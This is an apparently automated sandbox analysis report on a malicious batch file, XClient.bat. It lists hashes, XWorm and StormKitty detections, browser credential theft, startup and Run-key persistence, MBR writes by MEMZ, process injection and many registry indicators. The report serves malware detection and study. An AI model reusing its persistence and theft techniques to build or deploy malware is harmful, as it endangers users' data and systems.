Resubmissions
04-09-2024 03:02
240904-djne2svhpa 1004-09-2024 03:01
240904-djb21svhne 104-09-2024 01:09
240904-bhv3dstbjg 1003-09-2024 23:53
240903-3xrgaszhqm 1003-09-2024 23:29
240903-3gywfa1fna 1003-09-2024 23:26
240903-3ev2rs1erg 10Analysis
-
max time kernel
903s -
max time network
912s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 03:02
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240802-en
Errors
General
-
Target
XClient.bat
-
Size
320KB
-
MD5
e0d59aedb927f0aad0b47eab247e5fbc
-
SHA1
8abe8db8e344729b0f78d83e540b17a31893ed92
-
SHA256
ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c
-
SHA512
7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97
-
SSDEEP
6144:HQIYl64Q3Gx/E7X3YIzsUW4MN2nwaF0FbD/VdFzqEE/jeT3/:HQIh77X3t6+4VdFzoW/
Malware Config
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3752-50-0x0000020064E00000-0x0000020064E5A000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3752-1118-0x00000200664D0000-0x00000200665F0000-memory.dmp family_stormkitty -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 12 IoCs
Processes:
powershell.exeflow pid process 18 3752 powershell.exe 29 3752 powershell.exe 57 3752 powershell.exe 59 3752 powershell.exe 75 3752 powershell.exe 95 3752 powershell.exe 110 3752 powershell.exe 112 3752 powershell.exe 114 3752 powershell.exe 117 3752 powershell.exe 118 3752 powershell.exe 204 3752 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4072 powershell.exe 3184 powershell.exe 3752 powershell.exe 3180 powershell.exe 4380 powershell.exe 3224 powershell.exe 3184 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeMEMZ.exeMEMZ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation MEMZ.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation MEMZ.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe -
Executes dropped EXE 12 IoCs
Processes:
System Userngrok.exeSystem UserSystem UserSystem UserMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exepid process 3616 System User 1952 ngrok.exe 1864 System User 1732 System User 2360 System User 5972 MEMZ.exe 5844 MEMZ.exe 5220 MEMZ.exe 5224 MEMZ.exe 5940 MEMZ.exe 4656 MEMZ.exe 5656 MEMZ.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User" powershell.exe -
Drops desktop.ini file(s) 17 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\Contacts\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Links\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Searches\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini powershell.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Videos\desktop.ini powershell.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2170637797-568393320-3232933035-1000\desktop.ini powershell.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Music\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Documents\desktop.ini powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
MEMZ.exedescription ioc process File opened for modification \??\PhysicalDrive0 MEMZ.exe -
Drops file in System32 directory 2 IoCs
Processes:
chrome.exedescription ioc process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3752 set thread context of 5108 3752 powershell.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ngrok.exeMEMZ.exepowershell.exeMEMZ.exeMEMZ.exeMEMZ.exeexplorer.exeMEMZ.exeMEMZ.execvtres.exeMEMZ.exenotepad.exeIEXPLORE.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ngrok.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4248 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3230489867" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c0000000002000000000010660000000100002000000097943eff7644d7db102705cee49f1f7211b49e43fa9a7a3216c5862a21fefd3b000000000e8000000002000020000000b1e6d883bcd6d846c577d339e9e807b44fbdd02c03f84c976844ba2d62a4395c200000001dd77d23fd398bcffe8926ecd200ce8a21bfb97f2b193af7f3ab3706e4b6b33f4000000068a1920ee59507af67c93083a247b1e3a4199028b75673f30e4dbb4180a3558a7f90f46159f007637c54f3cbc939212d79435acbe2aaca9536ff76e50b612aca iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c00000000020000000000106600000001000020000000166ef43981c7b9d7a4840dd16f2e3619c828767bdcef4e6523b5a60e759c46da000000000e8000000002000020000000d351d725c9da9e30ccb4d7611ffd65c45f7db09548fa07c6757cedf15d60304e2000000066a59a41bac742755b900b52e7777d156854625a7527f240e51c629ad89e69d840000000088d6f6e7d6f329a49fe69ac415e82869eb55acd0546778887373cc92aa9046f62cd15501a1d1765073c5c90d7c3932620d2311c21a84027ed22b13bf727509b iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70d082c177feda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129207" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{EC02B3C3-6A6A-11EF-A2A4-CA89CBF88D4A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3230489867" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60fc89c177feda01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31129207" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE -
Modifies data under HKEY_USERS 18 IoCs
Processes:
LogonUI.exechrome.exemsedge.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "66" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133698928198350541" msedge.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 45 IoCs
Processes:
explorer.exefirefox.exemsedge.exepowershell.exepowershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{D62D31EB-3D9A-4186-B756-F6AAFB606196} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} explorer.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d3162b92-9365-467a-956b-92703aca08af}\Instance\ explorer.exe Key created 